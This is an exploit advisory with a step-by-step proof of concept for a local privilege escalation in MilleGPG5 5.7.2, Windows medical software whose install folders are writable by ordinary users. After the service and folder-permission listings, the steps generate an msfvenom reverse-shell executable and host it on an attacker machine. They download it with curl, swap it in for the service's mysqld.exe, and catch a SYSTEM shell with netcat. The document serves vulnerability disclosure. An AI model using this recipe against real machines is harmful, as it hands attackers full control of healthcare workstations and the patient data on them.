# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation # Date: 2021-07-19 # Author: Alessandro 'mindsflee' Salzano # Vendor Homepage: https://millegpg.it/ # Software Homepage: https://millegpg.it/ # Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe # Version: 5.7.2 # Tested on: Microsoft Windows 10 Enterprise x64 MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute". Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a. Affected version: MilleGPG5 5.7.2 # Details # By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below. # A low privilege account is able to rename the mysqld.exe file located in bin folder and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. (1) Impacted services. Any low privileged user can elevate their privileges abusing these services: C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe C:\Program Files\MilleGPG5\GPGService.exe Details: SERVICE_NAME: MariaDB-GPG TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MariaDB-GPG DEPENDENCIES : SERVICE_START_NAME : LocalSystem ------ SERVICE_NAME: GPGOrchestrator TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : GPG Orchestrator DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) ...[SNIP]... --------------- C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system